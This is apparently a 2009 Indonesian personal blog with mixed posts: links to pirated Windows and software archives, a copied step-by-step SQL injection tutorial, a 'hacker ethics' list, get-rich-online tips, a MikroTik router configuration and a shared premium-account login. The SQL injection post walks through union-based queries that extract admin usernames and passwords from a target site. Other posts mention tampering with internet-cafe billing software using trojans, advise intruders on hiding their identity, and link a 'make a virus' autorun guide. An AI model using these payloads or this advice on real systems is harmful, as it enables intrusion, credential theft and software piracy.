http://www.filefactory.com/file/ag69443/n/
Keosoft90_VisAE2_part12_rar
http://www.filefactory.com/file/ag6946d/n/
Keosoft90_VisAE2_part13_rar
http://www.filefactory.com/file/ag6946c/n/
Keosoft90_VisAE2_part14_rar
http://www.filefactory.com/file/ag6946a/n/
Keosoft90_VisAE2_part15_rar
http://www.filefactory.com/file/ag6947b/n/
Keosoft90_VisAE2_part16_rar
http://www.filefactory.com/file/ag695bb/n/
Keosoft90_VisAE2_part17_rar
http://www.filefactory.com/file/ag69463/n/
Keosoft90_VisAE2_part18_rar
http://www.filefactory.com/file/ag69467/n/
Keosoft90_VisAE2_part19_rar
http://www.filefactory.com/file/ag6947a/n/
Keosoft90_VisAE2_part20_rar
http://www.filefactory.com/file/ag6954e/n/
Keosoft90_VisAE2_part21_rar
http://www.filefactory.com/file/ag695b3/n/
Keosoft90_VisAE2_part22_rar
http://www.filefactory.com/file/ag6954c/n/
Keosoft90_VisAE2_part23_rar
http://www.filefactory.com/file/ag69474/n/
Keosoft90_VisAE2_part24_rar

Sabtu, 06 Juni 2009

Cara Kerja Blling Explorer

Billing explorer biasa bekerja pada port 1500 (default). Ini merupakkkan celah yang dapat dimanfaatkan untuk melakukan berbagai tindakan-tindakan yang lebih esktrim (hehehehhe keknya gaya bahasanya seperti seorang yang berpengetahuan luas, padahal saya katro... :D).

Ok let's begin
port dimanfaatkan untuk melakukan pengiriman sejumlah bit data (informasi untuk billing server) . Hmmmm...ini merupakan celah yang bisa dimanfaatkan untuk melakukan tindakan
crack(jangan terpengaruh dengan gaya bahasa saya) baik itu mereset jumlah tarif billing atau merusak daftar harga billing. caranya dengan melakukan pengiriman trojan,worm,dan sejenis virus lainnya. biasanya bahasa pemograman nya seperti ini, (pake bahasa yg mudah ajah ah..) :

pertama : pada saat melakkukan koneksi ke billing server, sintaksnya untuk menggabarkan bahwa komputer client (user) ada yang mermakai.

Kedua : selanjutnya menit demi menit tarif di hitung sesuai dengan waktu yang telah disetting(default) oleh program billing server dan client.

Ini hanya sekilas tentang cara kerja billing explorer. Jika kita seorang programer atau yang mengerti tentang bahasa pemograman kita akan tau celah mana yang bisa dimanfaatkan. Dan buat para OP warnet ini adalah hal yang berbahaya jika ada yang membuat program tersebut.


Hmmm...
programnya seperti apa yach......

Senin, 20 April 2009

Windows XP Vienna v.3 SP3



Windows XP Vienna v.3 SP3 (9 in 1) 3EN-3FR-3AR with Sata | 626.88 MB

This CD Contains:
Windows Vienna Home English
Windows Vienna Business English
Windows Vienna 7 English
Windows Vienna Home French
Windows Vienna Business French
Windows Vienna 7 French
Windows Vienna Home Arabic
Windows Vienna Business Arabic
Windows Vienna 7 Arabic

Release Name: Windows XP Vienna v.3 SP3 (9 in 1) 3EN-3FR-3AR with Sata
Format: ISO
Compression Size: 626.88 MB
No CD-KEY needed. Already Slipstreamed.
No ACTIVATION needed.
No CRACK needed.
No PATCHES needed.
All auto install.
Accept updates.
Sata drivers integrated.
Updates and hotfixes until April 2009 integrated.


Download:
http://rapidshare.com/files/222805136/vienna3_9in1__www.dl4all.com.part1.rar
http://rapidshare.com/files/222804851/vienna3_9in1__www.dl4all.com.part2.rar
http://rapidshare.com/files/222806452/vienna3_9in1__www.dl4all.com.part3.rar
http://rapidshare.com/files/222806165/vienna3_9in1__www.dl4all.com.part4.rar
http://rapidshare.com/files/222806202/vienna3_9in1__www.dl4all.com.part5.rar
http://rapidshare.com/files/222806346/vienna3_9in1__www.dl4all.com.part6.rar
http://rapidshare.com/files/222803026/vienna3_9in1__www.dl4all.com.part7.rar

Sabtu, 18 April 2009

Sql Injection Ver. 5

Age : 17
Sejak : 18 April 2009
Lokasi : Makassar


PostSubyek: Sql Injection Ver. 5 Tue Oct 28, 2008 4:51 pm
Untuk mencari ada atau tidak bugnya sebenernya ada di artikel sebelumnya, juga standar pencarian union, gue cuma nambahin sedikit aja, jadi gue copy paste aje ye

1.) Cek Kutu

Misalkan kita mendapatkan target

http://www.target.com/news.php?id=5

Sekarang kita test ada kutunya g tuh website dengan menambahkan di url’

contoh http://www.target.com/news.php?id=5'

maka akan muncul error

“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”

Atau Yang mendekati

Itu berarti kita bisa gunakan Sql Injection

2). Mencari nomor dari kolom

Untuk mencari nomor dari kolom kita menggunakan perintah ORDER BY

Kita melakukan perurutan nomor sampai ada error

http://www.target.com/news.php?id=5+order+by+1/* <– no error

http://www.target.com/news.php?id=5+order+by+2/* <– no error

http://www.target.com/news.php?id=5+order+by+3/* <– no error

http://www.target.com/news.php?id=5+order+by+4/* <– error (kita akan mendapatkan pesan seperti Unknown column ‘4' in ‘order clause’ atau sesuatu seperti itu…ya gitu degh ( )

Berarti kita mendapatkan kolomnya, ya itu 3, karena di 4 error.

Sedikit penjelasan, dalam penggunaan ORDER BY kita mencari pertemuan dimana website itu menjadi error dan tidak, setelah itu mendapatkannya, kita ambil yg tidak erorr terakhir sebelum keluar error.

3). Menggunakan fungsi UNION

Dengan menggunakan UNION kita dapat memilih lebih banyak data dalam satu statemen sql.

Jadi kita mendapatkan

http://www.target.com/news.php?id=5+UNION+SELECT+1,2,3/* (kita telah menemukan bahwa nomor dari kolom-kolom adalah 3 di dalam bagian 2)

Sekarang lihat pada artikel, artikelnya akan berubah jadi nomor 1 atau 2 atau 3 atau keluar semuanya, itu lah gunanya UNION

4). Check versi dari MySQL

http://www.target.com/news.php?id=5+union+select+1,2,3/*

NOTE: jika /* tidak bisa atau terjadi error, coba dengan –

ini merupakan suatu komentar penting bagi query kita untuk bekerja dengan baik.

Misalkan kita mendapatkan nomor 2 di dalam tampilan, sekarang kita cek verisinya

kita buang nomor 2, ganti dengan version() atau @@version nanti akan mendapatkan seperti 4.1.33-log atau 5.0.45 atau yang mendekati.

Contoh tampilan : http://www.target.com/news.php?id=5+union+select+1,@@version,3/*

Jika kamu mendapatkan error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”

Yang kita butuhkan adalah fungsi convert()

contoh :

http://www.target.com/news.php?id=5+union+select+1,convert(@@version+using+latin1),3/*

atau dengan hex() dan unhex()

contoh :

http://www.target.com/news.php?id=5+union+all+select+1,unhex(hex(@@version)),3/*

dan kamu akan mendapatan versi MySql D

5). Mendapatkan table dan nama column

Jika versi MySQL adalah 5 (contoh : 5.0.45, 5.0.51a-community…)

– Mencari Table

Contoh Nomor yang keluar ada 2, jadi kita masukan perintah injekan di nomor 2

http://www.target.com/news.php?id=5+union+select+1,table_name,3+from+information_schema.tables+where+table_schema=database()+limit+0,1/*

Untuk melihat table selanjutnya kita rubah limit+0,1/* menjadi limit+1,1/* lalu limit+2,1/* dst.

Sampai tabel yang dinginkan, contoh table admin

– Mencari Column

Sekarang kita cari column pada table admin

http://www.target.com/news.php?id=5+union+select+1,column_name,3+from+information_schema.columns+where+table_name=’admin’+limit+0,1/*

Setandarnya bisa menggunakan itu jika quotenya off, tetapi jika quote on nama table harus di encode dengan hexa

admin = 61646D696E

Untuk dapat di baca oleh perintah SQL, harus di tambahakan 0x sihingga menjadi 0×61646D696E

http://www.target.com/news.php?id=5+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0×61646D696E+limit+0,1/*

Untuk melihat colum selanjutnya tinggal merubah limitnya seperti table diatas.

Contoh column yang keluar username dan password

Sekarang kita lihat datanya

http://www.target.com/news.php?id=5+union+select+1,username,3+from+admin/*

Contoh data yang keluar : admin

http://www.target.com/news.php?id=5+union+select+1,password,3+from+admin/*

Contoh data yang keluar : p45w0rd

sekarang kita harus menyelesaikan query biar terlihat bagus )

untuk itu kita menggunakan fungsi concat() (merupakan penggabungan strings)

contoh :

http://www.target.com/news.php?id=5+union+all+select+1,concat(username,0×3a,password),3+from+admin/*

catatan : 0×3a, adalah nilai hex dari 3a, sedangkan 0x merupakan tambahan untuk dapat di baca oleh URL

(ada cara lain untuk itu dengan menggunakan, char(5Cool, merupakan dari nilai decimal )

http://www.target.com/news.php?id=5+union+all+select+1,concat(username,char(5Cool,password),3+from+admin/*

Maka akan muncul tampilan data : admin:p45w0rd

ETIKA SEORANG HACKER

Author: admin | Filed under: Stories

Ditulis oleh Sang Perisai
Wednesday, 07 July 2004
Terakhir Diperbaharui Tuesday, 22 January 2008

Pengembangan Penulisan 03 Maret 2009
Etika Seorang Hacker
————————————
- * Akses ke komputer-komputer – dan segala sesuatu yang berpotensi untuk mengajarmu mengenai dunia ini haruslah
bebas dan total. Semua informasi haruslah tersedia secara bebas / cuma-cuma.
- * Jangan percaya otoriter/kemapanan – dukung desentralisasi.
- * Hackers haruslah dinilai berdasarkan kemampuan hackingnya – bukannya berdasar kriteria seperti derajat, umur, ras,
atau posisi. Anda bisa berkarya seni dan keindahan melalui komputer. Komputer dapat merubah hidupmu menuju
kelebih baikan
- Sedangkan dalam prakteknya, Etika Hacker diatas (prinsip) dipraktekkan dengan mengikuti kode etik:
- * Jangan merusak sistem manapun secara sengaja. (rmrf hard disk, crash, overflow, dll. Mengubah tampilan
index.html sebuah website sah-sah saja asalkan file aslinya disimpan di sistem yang sama dan bisa diakses oleh
administrator.)
- * Jangan mengubah file-file sistem selain yang diperlukan untuk mengamankan identitas anda.
- * Jangan meninggalkan nama asli anda (maupun orang lain), handle asli, maupun nomor telepon asli di sistem apapun
yang anda akses secara ilegal. Mereka bisa dan akan melacak anda dari handle anda.
- * Berhati-hatilah dalam berbagi informasi sensitif. Pemerintah akan menjadi semakin pintar. Secara umum, jika anda
tidak mengenal siapa sebenarnya lawan bicara/chatmu, berhati-hatilah!
- * Jangan memulai dengan mentargetkan komputer-komputer milik pemerintah. Ya, ada banyak sistem milik
pemerintah yang cukup aman untuk di-hack, namun resikonya lebih besar dari keuntungannya. Ingat, pemerintah punya
dana yang tak terbatas dibanding dengan ISP/Perusahaan yang objektifnya adalah untuk mencari profit..
Sang Perisai Sakti
http://sangperisai.phpnet.us/rubbish2 Powered by: Joomla! Generated: 3 March, 2009, 12:01

Tips & Trik Mencari Uang Lewat Internet


Author: admin | Filed under: Tips Dan Triks

Dunia internet bukan saja menawarkan informasi dan berita terkini, tapi juga menawarkan keuntungan finansial bagi yang tahu bagaimana memanfaatkan media ini untuk menghasilkan uang. Bagaimana dan seberapa besar keuntungan yang bisa dicapai lewat media ini? Simak lebih lanjut.. Kalau bicara mencari uang di internet, siapa saja bisa melakukannya dan sangat tergantung seberapa keseriusan orang yang ingin mendapatkan uang tersebut dan juga jumlah yang akan dihasilkan. Internet sendiri merupakan media yang dapat dikatakan cukup mudah untuk menghasilkan uang bagi mereka yang mengerti karena banyak sekali peluang untuk itu dan akan semakin bertambah dari hari ke hari. Situs yang ditujukan untuk komersial atau menghasilkan uang sendiri juga sangat banyak di internet saat ini dan bahkan ada situs yang memang dirancang khusus untuk itu. Berikut kami sajikan beberapa cara yang biasanya dilakukan oleh netter untuk mendapatkan uang di internet :

1. Membuat situs untuk iklan, afiliasi dan promosi serta marketing online Cara ini bisa dibilang paling efektif dalam mencari uang di internet dan bebas resiko karena netter hanya butuh situs baik yang gratis ataupun yang bayar sebagai media gratis 24 jam untuk menampilkan iklan seperti Google Adsenseatau menjadikan situsnya sebagai afiliasi untuk promosi penjualan barang dari situs lainnya seperti afiliasi dengan Amazon (situs penjualan buku) di mana netter bisa mendapatkan komisi dari setiap buku yang dibeli oleh netter lainnya yang masuk lewat link dari situs. Kelebihan: bebas resiko dan mudah dilakukan Kekurangan: netter butuh waktu untuk membuat situs dan butuh pengetahuan untuk itu serta harus sering meng-update situs supaya sering dikunjungi netter lainnyaPenghasilan: tergantung dari jumlah “hit” (netter yang mengunjungi situs) per hariContoh situs : adsense.com - amazon.com

2. Menjadi internet trader Cara ini juga cukup efektif bagi yang rajin dan yang hobi belajar trading mata uang (Forex) karena kalau netter sampai menjadi seorang ahli trading, penghasilan yang di dapat juga bisa sangat tinggi dan bisa mendapat ratusan hingga puluhan ribu dollar per-minggu atau per-bulan. Saat inibanyak media yang menyediakan trading gratis untuk belajar dan bahkan bisa mendapatkan uang gratis untuk trading sesungguhnya seperti di Marketiva.

Kelebihan: menjanjikan keuntungan finansial yang sangat besar dan untuk pemula tidak perlu modal awal Kekurangan: butuh waktu untuk belajar dan pengalaman untuk menjadi ahli tradingPenghasilan: tergantung seberapa rajin anda belajar dan kepintaran anda dalam ber-trading. Seorang ahli trading rata-rata bisa mendapatkan profit ribuan hingga ratusan ribu dollar per-minggu Contoh situs: marketiva.com

3. Ber-investasi online Cara ini mengandung resiko (bisa rugi) dan butuh modal awal untuk bisa mendapatkan profit. Untuk berinvestasi online sendiri juga butuh waktu belajar, pengalaman dan harus mengikuti ketentuan investasi baru bisa menikmati profit pada akhirnya. Banyak netter di luar negeri yang hidup dari investasi online ini dan biasanya mereka yang sudah lama berkecimpung atau yang sudah berpengalaman di bidang ini. Kelebihan: cara yang mudah untuk mendapatkan keuntungan karena tidak membutuhkan keahlian apapun asal punya modalKekurangan: berpotensi rugi (kehilangan modal) kalau tidak hati-hati dalam berinvestasi karena banyak investasi yang menipu atau gagal bayar bahkan bangkrut karena salah kelola atau salah manajemen Penghasilan: bervariatif tergantung dari nilai modal investasi dan profit yang dijanjikan

4. Dibayar untuk beraktifitas di internet Cara ini juga bisa dikatakan sangat mudah tapi bisa menghabiskan waktu yang sangat banyak sedangkan profit yang didapat biasanya jumlahnya sedikit dan baru dibayar setelah mencapai jumlah tertentu yang biasanya baru bisa didapat setelah berbulan-bulan. Cara ini biasanya dilakukan oleh netter dengan mendaftarkan diri mereka untuk ikut program membaca e-mail iklan, klik iklan, surfing di internet, posting berita atau blog, memakai search engine yang semuanya biasanya ditawarkan gratis Kelebihan: termasuk cara mudah juga untuk mendapatkan uang dan tidak memerlukan modal awal berupa uang.

Kekurangan: cara ini memerlukan waktu yang cukup banyak dan pada umumnya cukup membuang waktu, belum lagi kalau ada program yang tidak membayarPenghasilan: tidak efektif dan jumlah uang yang dihasilkan biasanya sangat kecilContoh situs: mylot.com , Flixya

5. Jualan produk, barang dan jasa lewat internet (e-commerce) Cara ini biasanya dilakukan oleh netter yang mempunyai produk, barang dan jasa yang nilainya bisa menjual dan menghasilkan uang. Mereka biasanya membuat situs yang bisa mendukung dan memberikan informasi tentang apa yang akan dijual mereka. Kelebihan: termasuk cara efektif untuk menghasilkan uang lewat penjualan online dan promosi produk sekaligus Kekurangan: butuh produk, barang dan jasa serta modal, pengetahuan mengelola situs dan juga sekuriti untuk situs Penghasilan: bervariatif tergantung dari nilai produk, barang dan jasa serta daya dan jumlah pembeli dari pengunjung situs Kesimpulan

Kalau seorang netter bisa memanfaatkan 3 dari 5 cara di atas secara efektif, saya yakin dia akan bisa memperoleh jumlah finansial yang memadai dan jumlahnya akan makin bertambah dari hari ke hari. Memang masih ada beberapa cara yang bisa dilakukan orang atau netter untuk bisa mendapatkan uang dan kelima cara di atas hanya mewakili cara yang pada umumnya dilakukan oleh orang atau netter untuk mendapatkan uang di internet. Modal utama anda sebenarnya cuma butuh komputer yang terkoneksi ke internet untuk bisa menghasilkan uang walau beberapa cara di atas juga memerlukan modal awal untuk supaya bisa memulainya. Kecepatan koneksi mungkin juga akan sangat berpengaruh dalam beberapa hal untuk bisa memperlancar usaha anda untuk mendapatkan uang di internet. Selama mencoba!

Sumber : Ketok.com & pakmin.co.cc

SETTING ROUTER MIKROTI

Author: Hendra Gunawan S.Komp | Filed under: Networking

COPY PASTE AJA

DASAR
system identity set name=xcode.net
user set admin password=123456

ethernet

interface ethernet enable ether1
interface ethernet enable ether2
interface ethernet set ether1 name=intranet
interface ethernet set ether2 name=internet

IP ADDRESS_

ip address add interface=internet address=XXXXX (dari ISP)
ip address add interface=intranet address=192.168.0.1/24

route

ip route add gateway=XXXXX (dari ISP)

dns

ip dns set primary-dns=XXXXX (dari ISP) 2 secondary-dns=XXXXX (dari ISP)

nat & filter firewall standar

ip firewall nat add action=masquerade chain=srcnat
ip firewall filter add chain=input connection-state=invalid action=drop
ip firewall filter add chain=input protocol=udp action=accept
ip firewall filter add chain=input protocol=icmp action=accept
ip firewall filter add chain=input in-interface=intranet action=accept
ip firewall filter add chain=input in-interface=internet action=accept

dhcp server

ip dhcp-server setup
dhcp server interface: intranet
dhcp address space: 192.168.0.0/24
gateway for dhcp network: 192.168.0.1
addresses to give out: 192.168.0.2-192.168.0.254
dns servers: XXXXX (dari ISP),XXXXX (dari ISP)
lease time: 3d

web proxy

ip web-proxy
set enabled=yes
set src-address=0.0.0.0
set port=8080
set hostname=”proxy.xcode.net”
set transparent-proxy=yes
set parent-proxy=0.0.0.0:0
set cache-administrator=”admin.xcode.net”
set max-object-size=4096KiB
set cache-drive=system
set max-cache-size=unlimited
set max-ram-cache-size=unlimited

bikin redirect port ke transparant proxy

/ip firewall nat add chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080
/ip firewall nat add chain=dstnat protocol=tcp dst-port=3128 action=redirect to-ports=8080
/ip firewall nat add chain=dstnat protocol=tcp dst-port=8080 action=redirect to-ports=8080

PCQ

/ip firewall mangle add chain=forward src-address=192.168.169.0/28 action=mark-connection new-connection-mark=client1-cm
/ip firewall mangle add connection-mark=client1-cm action=mark-packet new-packet-mark=client1-pm chain=forward
/queue type add name=downsteam-pcq kind=pcq pcq-classifier=dst-address
/queue type add name=upstream-pcq kind=pcq pcq-classifier=src-address
/queue tree add parent=intranet queue=downsteam-pcq packet-mark=client1-pm
/queue tree add parent=internet queue=upstream-pcq packet-mark=client1-pm

simpel queue

queue simple add name=kbu-01 target-addresses=192.168.0.11
queue simple add name=kbu-02 target-addresses=192.168.0.12
queue simple add name=kbu-03 target-addresses=192.168.0.13
queue simple add name=kbu-04 target-addresses=192.168.0.14
queue simple add name=kbu-05 target-addresses=192.168.0.15
queue simple add name=kbu-06 target-addresses=192.168.0.16
queue simple add name=kbu-07 target-addresses=192.168.0.17
queue simple add name=kbu-08 target-addresses=192.168.0.18
queue simple add name=kbu-09 target-addresses=192.168.0.19
queue simple add name=kbu-10 target-addresses=192.168.0.20
queue simple add name=xbilling target-addresses=192.168.0.2

BLOX SPAM

/ip firewall filter add chain=forward dst-port=135-139 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=135-139 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=593 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=4444 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=5554 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=9996 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=995-999 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=53 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=55 protocol=tcp action=drop

Kamis, 02 April 2009

Menghasilkan Rupiah Dari Internet

Cara mendapatkan uang Rupiah dari internet

Lihat, Klik dapat uang

awalnya aku merasa ini adalah hal yg biasa saja (penipuan), Namun setalah beberapa hari aku ikutin ternya berhasil juga.
pertama sich....dengar dari teman yg bilang kalo di internet bukan hanya dollar ajah yg kita bisa dapat tp rupiah juga bisa di dapat.
usut punya usut. aku coba cari tau melalui omz google (www.google.com).
eh...... ternyata dapat.

Untuk lebih Jelasnya silahkan langsung ajah berhubungan dengan
www.buxrupiah.com atau Lihat, Klik dapat uang


SELAMAT MENCOBA...........................

Rabu, 01 April 2009

Bikin Virus

Cara membuat autorun pada Virus maupun file *.exe

Selamat mencoba

http://www.ziddu.com/download/4110634/CaraMembuatAutorun.rar.html

Scopier

Supper Copier

Supper Copier adalah sejenis Software yg dapat mempercepat proses cppy-an file dr hardisk-hardisk
maupun hardisk-fd.Untuk lebih jelasnya silahkan Di coba :
http://www.ziddu.com/download/4110544/SuperCopier2.rar.html

Senin, 30 Maret 2009

Rapid Leech

http://www.bbia.go.id./baru/components/com_rsgallery/rapid/index.php


weiiiiiii......
semua, Kuliah mo ko baek2....
jangan mi lg malas2 ko
mau ko jadi MAHASISWA ABADI kah ? di KAMPUZ

Rapid Baru......Kuliah mo ko semuaaaaaaaaaaaaa

username : m1ch43ls
password : m1ch43lss

Login: m1ch43ls Expiration date: Sun, 12. Apr 2009 Traffic left: 1 323 MB (+0 GB)
RapidPoints: 1000 Server time: 30.03.2009 17:46:49 Used storage: 0 MB
RapidPoints PU: 0 TrafficShare left: 5.00 GB Files: 0

Minggu, 15 Maret 2009